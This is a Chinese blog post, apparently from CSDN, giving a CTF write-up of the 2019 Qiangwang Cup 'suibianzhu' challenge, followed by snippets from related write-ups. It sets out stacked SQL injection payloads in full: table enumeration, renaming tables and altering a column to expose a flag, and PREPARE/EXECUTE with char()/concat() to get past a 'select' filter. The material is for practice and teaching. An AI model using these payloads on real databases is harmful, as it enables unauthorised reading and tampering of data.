[强网杯 2019]随便注1

最新推荐文章于 2022-07-01 16:15:10 发布
最新推荐文章于 2022-07-01 16:15:10 发布
阅读量165 收藏
点赞数
分类专栏: ctfWP 文章标签: unctf 安全 sql 数据库
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_20533167/article/details/113686667
版权

[强网杯 2019]随便注1

  1. 打开后的样子
    在这里插入图片描述

  2. 法一:重命名+堆叠注入:可以执行任意sql语句

    1. 堆叠注入原理:在sql中,分号表示一条语句的结束。如果在分号的后面再加一条语句,这条语句也可以被执行,继续加一个分号和一条语句,这样就可以在一次数据库的调用中执行多个语句。

    2. 但是堆叠注入大多时候不可用

    3. 利用 or 1=1–+列举所以数据**?inject=1’or 1=1;–+**

    4. 查看一下表**?inject=1’;show tables;–+**

    在这里插入图片描述

    1. 有两个表,分别查看一下

      1. ?inject=1’;show columns from `1919810931114514`;–+
        在这里插入图片描述

      2. ?inject=1’;show columns from `words`;–+

    在这里插入图片描述

    3.  ?inject=1';select \* from \`1919810931114514\`;--+被过滤了。

在这里插入图片描述

alert和rename没过滤,所以可以把表列改名

    /?inject=1'; **RENAME** TABLE \`words\` TO \`words1\`; **RENAME** TABLE
    \`1919810931114514\` TO \`words\`; **ALTER** TABLE \`words\` CHANGE
    \`flag\` \`id\` VARCHAR(100) CHARACTER SET utf8 COLLATE utf8_general_ci
    NOT NULL; **show** columns from words;%23

 ?inject=1' or '1'='1?inject=1' or '1'='1

在这里插入图片描述

  1. 法二:预处理语句+堆叠注入:

在这里插入图片描述

  1. char(115,101,108,101,99,116)<----->'select’

    PREPARE name from ‘[my sql sequece]’; //预定义SQL语句 EXECUTE name;
    //执行预定义SQL语句 (DEALLOCATE || DROP) PREPARE name; //删除预定义SQL
    语句

    1. payload1: 1’;PREPARE hacker from concat(char(115,101,108,101,99,116),
      ’ * from `1919810931114514` ');EXECUTE hacker;#

    2. payload2: 1’;SET @sqli=concat(char(115,101,108,101,99,116),’* from
      `1919810931114514`’);PREPARE hacker from @sqli;EXECUTE hacker;#
      【使用变量】

    3. payload3: 1’;PREPARE hacker from concat(‘s’,‘elect’, ’ * from
      `1919810931114514` ');EXECUTE hacker;      #
      【只是用contact(),不使用char()】

  2. 引用参考:

    1. https://www.cnblogs.com/peri0d/p/12123814.html

    2. https://www.cnblogs.com/wjw-zm/p/12359735.html
      3814.html>

    3. https://www.cnblogs.com/wjw-zm/p/12359735.html

4pri1
关注
专栏目录
BUUCTF系列 // [强网杯2019] 随便
qq_45805420的博客
09-23 606
前言 本题知识点:SQL堆叠入 WP 打开题目,很明显的提示我们应该是SQL入了 So,先按照一般的流程,尝试基本的探测姿势 1. 探测有无入 1' 报错 1'--+ 报错 1'# 正常有回显 1' and 1=1# 正常有回显 1' and 1=2# 正常无回显 可知存在入,且 --+ 释被过滤,# 释可用 2. 尝试获取列数 1' order by 1# 正常有回显 1' order by 2# 正常有回显 1' order by 3# 报错 用 order by
SQL Injection8(堆叠入)——强网杯2019随便
热门推荐
kid的博客
05-28 1万+
SQL Injection8(堆叠入)——强网杯2019随便 前言 前面参加强网杯线上赛,亲身体验了一把ctf从入门到入土,从打ctf变成被ctf打… 这里结合里面的题来对里面的知识点进行一个学习总结 随便是一道sql入题,因为过滤规则十分强大,所以很难… 这里会用到堆叠入的知识,堆叠入前面有所了解,觉得并不难,所以也没练习过,但做这道题的时候就又些懵了。 堆叠入原理 在SQL中,...
BUUCTF-WEB:[强网杯 2019]随便 1
_Co1a
01-24 985
题目环境:http://de044ac0-9162-4b83-b6a6-8c99ce0efe91.node3.buuoj.cn 打开环境: 尝试入: 解题思路: 1、先尝试用union联合入:第一步、测试入点(一些小tips:利用引号,and 1=1, or 1=1之类的)判断是字符型还是数字型 1' [error] 1'# [不报错,正常回显] 1' and 1=1# ...
BUUCTF: [强网杯 2019]随便 1
emdog的博客
10-21 307
新手可以看下sql入基础原理(超详细)这篇博客,有一个基本的概念。 点开题目链接看到 首先判断下是什么类型的入,输入1',发现报错,说明是字符型入,单引号闭合 输入1, 输入1' or 1=1#,显示 再测试字段数' order by 1 #,到3时报错,说明字段数为2,即2列。 尝试用union select联合查询继续获取信息,输入1' union select 1,2,database()# database()将会返回当前网站所使用的数据库名字. user()将会返回执行当前查询的用
[强网杯 2019]随便 1
qq_43618536的博客
07-01 171
BUUCTF的[强网杯 2019]随便 1
【BUUCTF】web之强网杯2019随便
12-14
开始入: 1’ : 报错 ...# 这里意表名为数字的要加反引号 “ :在网上百度发现 得到 一个带有flag的字段 和 另一个 可查询的表 flag表:可查询表: 到这里虽然发现flag 但是select已经被ban了所
[强网杯 2019]随便.docx
最新发布
12-18
强网杯 2019SQL 入详解 SQL 入是一种常见的网络安全漏洞,攻击者通过在输入参数中嵌入恶意的 SQL 代码,从而控制或篡改数据库的行为。在本题中,参赛者面对的就是一道典型的 SQL 入题目。首先,通过尝试...
BMZCTF 强网杯 2019 随便
qq_26243045的博客
11-29 396
考点:sql入、二次入 打开网页,是一个输入框: 输入1,并提交: 看到返回数组,测试是否存在入点:输入1‘ 返回报错。 输入1‘ # 返回正常 尝试手工入: 1、输入1‘ order by *,测试能返回几列,多次尝试,*处为2,即:1’ order by 2能返回正常。 再试着输入select测试返回点:1’ union select 1,2 # 看到好多字符被过滤。尝试sqlmap 只能爆出库名为supersqli 尝试堆叠入 输入:1’; s
buuctf [强网杯 2019]随便 1
weixin_45642610的博客
01-07 1万+
buuctf web [强网杯 2019]随便 1 -刷题个人日记 小白一个,写给自己看。 打开后是这样。 从题目和内容来看就是一道sql入题。 输入 1' or 1=1;# 这个#用来释掉后面的sql语句 显示所有数据,这个数据有什么用我也不知道,但sql入一般第一步就是这样看看有没有有用的信息(没有)。 输入 1' order by 2;# 1' order by 3;# 到第3列报错,说明只显示两列。 输入1'; show tables;# 可以看到有 191981093
【BUUCTF】[强网杯 2019]随便 1
qq_45972928的博客
05-06 4085
这是一个典型的sql入题目 知识点: 1、入点检测 2、万能匹配 3、暴力获得数据表和其属性 4、sql语句的掌握(order by; union select; rename table; alter table…等等) 1、进入网站 2、看到一个输入框一个提交框,尝试进行数据输入了解大致情况 经过尝试我们发现,只有输入1,2时有显示,输入0或者其他时没有显示 3、测试是否存在入 and 1=1和and 1=2没有变化 在参数后面加单引号,发现错误,可以尝试进行入 4、尝试0‘ or
web buuctf [强网杯 2019]随便1
weixin_44214568的博客
07-31 353
1.简单随便填个 1 2.输入 1' 再尝试输入 1' # 有输出,证明确实存在sql入; 3.常用入 a. 1' or 1=1;# b.依次试1' order by 1;# 依次试1' order by 2;# 1' order by 3;# 证明只有两个字段; 4.利用 union select 进行联合查询 1’ union select 1,2;# 正则表达式,难搞哦 5.利用堆叠入 堆叠入原理: 在SQL...
[强网杯 2019]随便 1-堆叠
qq_43564182的博客
07-10 569
解题 0x01 堆叠入学习(堆叠查询,Stacked Queries) 堆叠入为攻击者提供了很多控制权,与仅限于SELECT语句的UNION联合查询攻击不同,堆叠入可以用于执行任何SQL语句。 堆叠入原理 在sql中,分号表示一条语句的结束。如果在分号的后面再加一条语句,这条语句也可以被执行,继续加一个分号和一条语句,这样就可以在一次数据库的调用中执行多个语句。 举个堆叠入攻击的例子 执行查询时,第一个语句执行信息查询,第二个语句则将表user的所有内容给删除了。 mysql> select
BUUCT日记--[强网杯 2019]随便
weixin_41607190的博客
03-30 373
输入 1' union select database()# 会发现被过滤了select、where等关键字 但是“;”没有被过滤,尝试用堆叠入 堆叠入,简单来说就是在表单内用分号隔开,形成一行执行多个语句的效果 输入 1';show tables;# 输入 1';show columns from `1919810931114514`;# 发现flag字段,但是怎么绕过select...
buuctf-强网杯2019随便
09-03
buuctf-强网杯2019随便是一场2019强网杯举办的CTF比赛中的一道题目。这道题目的名称暗示着它是一个与入漏洞相关的题目。 入漏洞是一种网络安全漏洞,攻击者可以通过在用户输入的数据中入恶意代码来获取...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值